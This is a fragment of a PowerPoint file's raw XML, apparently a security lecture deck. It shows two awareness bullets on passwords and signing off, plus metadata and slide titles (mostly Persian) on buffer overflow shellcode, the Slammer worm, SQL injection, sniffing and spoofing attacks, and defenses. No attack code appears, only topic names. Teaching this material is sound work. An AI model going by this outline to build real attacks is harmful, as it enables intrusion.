            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not share your ID’s or pass codes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with anyone.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Always sign off </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web sites or secure areas of Web Sites.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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95</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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3/6/2008 12:03:03 PM&quot;&gt;&lt;Slide id=&quot;335&quot; dur=&quot;.609375&quot;/&gt;&lt;Slide id=&quot;337&quot; dur=&quot;13.53516&quot;/&gt;&lt;Slide id=&quot;335&quot; dur=&quot;.765625&quot;/&gt;&lt;Slide id=&quot;337&quot; dur=&quot;4.699219&quot;/&gt;&lt;Slide id=&quot;312&quot; dur=&quot;2.902344&quot;/&gt;&lt;Slide id=&quot;313&quot; dur=&quot;7.195313&quot;/&gt;&lt;Slide id=&quot;316&quot; dur=&quot;10.69141&quot;/&gt;&lt;Slide id=&quot;317&quot; dur=&quot;1.734375&quot;/&gt;&lt;Slide id=&quot;336&quot; dur=&quot;1.703125&quot;/&gt;&lt;Slide id=&quot;338&quot; dur=&quot;1&quot;/&gt;&lt;/Timings&gt;&lt;/WMTools&gt;"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Default Design">
  <a:themeElements>
    <a:clrScheme name="Default Design 14">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9600"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Default Desig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Tahoma"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Tahoma"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9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4">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96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2010-10-11T10:34:43Z</outs:dateTime>
      <outs:isPinned>true</outs:isPinned>
    </outs:relatedDate>
    <outs:relatedDate>
      <outs:type>2</outs:type>
      <outs:displayName>Created</outs:displayName>
      <outs:dateTime>2007-12-05T18:39:31Z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M Paul Zavidniak</outs:displayName>
          <outs:accountName/>
        </outs:relatedPerson>
      </outs:people>
      <outs:source>0</outs:source>
      <outs:isPinned>true</outs:isPinned>
    </outs:relatedPeopleItem>
    <outs:relatedPeopleItem>
      <outs:category>Last modified by</outs:category>
      <outs:people>
        <outs:relatedPerson>
          <outs:displayName>Behrouz</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Props1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{36FF20FB-9BC2-4D81-B599-22ACCD7FF61D}">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
  <TotalTime>15825</TotalTime>
  <Words>6350</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>994</Paragraphs>
  <Slides>95</Slides>
  <Notes>34</Notes>
  <HiddenSlides>9</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95</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="97" baseType="lpstr">
      <vt:lpstr>Default Design</vt:lpstr>
      <vt:lpstr>Clip</vt:lpstr>
      <vt:lpstr>هجوم به قصد دسترسي ( از طريق سوء استفاده از آسيب پذيري ها)  </vt:lpstr>
      <vt:lpstr>روند نماي کلي انجام يک حملة کامپيوتري </vt:lpstr>
      <vt:lpstr>فهرست مطالب</vt:lpstr>
      <vt:lpstr>ساختمان حافظه در هنگام اجراي برنامه ها</vt:lpstr>
      <vt:lpstr>ساختمان پشته در هنگام اجراي برنامه ها</vt:lpstr>
      <vt:lpstr>مثال</vt:lpstr>
      <vt:lpstr>مثال</vt:lpstr>
      <vt:lpstr>مثال دوم</vt:lpstr>
      <vt:lpstr>مثال دوم</vt:lpstr>
      <vt:lpstr>مثال سوم</vt:lpstr>
      <vt:lpstr>مثال سوم</vt:lpstr>
      <vt:lpstr>طراحي حمله!!!</vt:lpstr>
      <vt:lpstr>  ايجاد کد مورد نظر براي باز کردن shell</vt:lpstr>
      <vt:lpstr>کد مخرب را براي اجرا به برنامه بدهيد</vt:lpstr>
      <vt:lpstr>کد مخرب را براي اجرا به برنامه بدهيد</vt:lpstr>
      <vt:lpstr>چگونه آسيب پذيري برنامه ها را پيدا کنيم</vt:lpstr>
      <vt:lpstr>کرم Slammer نمونه اي از بهره برداري از سرريز بافر</vt:lpstr>
      <vt:lpstr>کرم  Slammer نمونه اي از بهره برداري از سرريز بافر</vt:lpstr>
      <vt:lpstr>کرم Slammer</vt:lpstr>
      <vt:lpstr>کرم Slammer</vt:lpstr>
      <vt:lpstr>کرم Slammer</vt:lpstr>
      <vt:lpstr>محل نفوذ در SQL Server</vt:lpstr>
      <vt:lpstr>روش هاي کشف و جلوگيري از Overflow</vt:lpstr>
      <vt:lpstr>فهرست مطالب</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Examples of what can SQL Injection do</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SQL Injection Tools</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>فهرست مطالب</vt:lpstr>
      <vt:lpstr>موارد کاربرد شنود در شبکه هاي کامپيوتري</vt:lpstr>
      <vt:lpstr>چگونه امکان شنود ترافيک شبکه وجود دارد؟</vt:lpstr>
      <vt:lpstr>شنود در شبکه هاي محلي مبتني بر هاب</vt:lpstr>
      <vt:lpstr>شنود در شبکه هاي مبتني بر سوئيچ</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>شنود در شبکه هاي مبتني بر سوئيچ</vt:lpstr>
      <vt:lpstr>شنود در شبکه هاي مبتني بر سوئيچ</vt:lpstr>
      <vt:lpstr>چگونه مي توان جلوي  شنود داده را گرفت؟  </vt:lpstr>
      <vt:lpstr>Detection of Sniffing</vt:lpstr>
      <vt:lpstr>NTop</vt:lpstr>
      <vt:lpstr>Ntop Architecture</vt:lpstr>
      <vt:lpstr>Ntop Web Interface</vt:lpstr>
      <vt:lpstr>ديگر ابزار هاي شنود</vt:lpstr>
      <vt:lpstr>ابزارهاي شناسايي نرم افزارهاي شنود</vt:lpstr>
      <vt:lpstr>فهرست مطالب</vt:lpstr>
      <vt:lpstr>حمله جعل</vt:lpstr>
      <vt:lpstr>انواع حملات جعل</vt:lpstr>
      <vt:lpstr>IP Spoofing</vt:lpstr>
      <vt:lpstr>مراحل کار در  IP Spoofing</vt:lpstr>
      <vt:lpstr>Why IP Spoofing is easy?</vt:lpstr>
      <vt:lpstr>Spoofing Attacks: </vt:lpstr>
      <vt:lpstr>Spoofing Attacks:</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Spoofing Attacks:</vt:lpstr>
      <vt:lpstr>Spoofing Attacks:</vt:lpstr>
      <vt:lpstr>Spoofing Attacks:</vt:lpstr>
      <vt:lpstr>دلايل استفاده از IP Spoofing</vt:lpstr>
      <vt:lpstr>ARP Spoofing</vt:lpstr>
      <vt:lpstr>ARP Poisoning &amp;Broadcast request</vt:lpstr>
      <vt:lpstr>ARP Poisoning--Response to a Request</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>E mail spoofing</vt:lpstr>
      <vt:lpstr>کاربرد جعل ايميل </vt:lpstr>
      <vt:lpstr>Sample SMTP interaction</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>راهکارهاي جلوگيري از email spoofing</vt:lpstr>
      <vt:lpstr>Basic DNS</vt:lpstr>
      <vt:lpstr>DNS Queries</vt:lpstr>
      <vt:lpstr>DNS Queries</vt:lpstr>
      <vt:lpstr>Problem</vt:lpstr>
      <vt:lpstr>DNS ID Spoofing</vt:lpstr>
      <vt:lpstr>DNS cache Poisonning</vt:lpstr>
      <vt:lpstr>BIND Birthday Attack </vt:lpstr>
      <vt:lpstr>Birthday Attack to BIND</vt:lpstr>
      <vt:lpstr>Why DNS Cache Poisoning?</vt:lpstr>
      <vt:lpstr>Defenses</vt:lpstr>
      <vt:lpstr>Defenses</vt:lpstr>
      <vt:lpstr>Web Spoofing</vt:lpstr>
      <vt:lpstr>Web Spoofing Information Flow Model</vt:lpstr>
      <vt:lpstr>Starting the Attack</vt:lpstr>
      <vt:lpstr>Have you ever received an e-mail like this?</vt:lpstr>
      <vt:lpstr>Spoofing attacks in the physical world</vt:lpstr>
      <vt:lpstr>Context</vt:lpstr>
      <vt:lpstr>URL Rewriting</vt:lpstr>
      <vt:lpstr>Remedies</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Northrop Grumman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Operational Military Perspective in Cyber Security</dc:title>
  <dc:subject>IEEE Technology Summit</dc:subject>
  <dc:creator>M Paul Zavidniak</dc:creator>
  <cp:lastModifiedBy>Ali</cp:lastModifiedBy>
  <cp:revision>467</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2007-12-05T18:39:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-04-12T17:16:21Z</dcterms:modified>
</cp:coreProperties>
</file>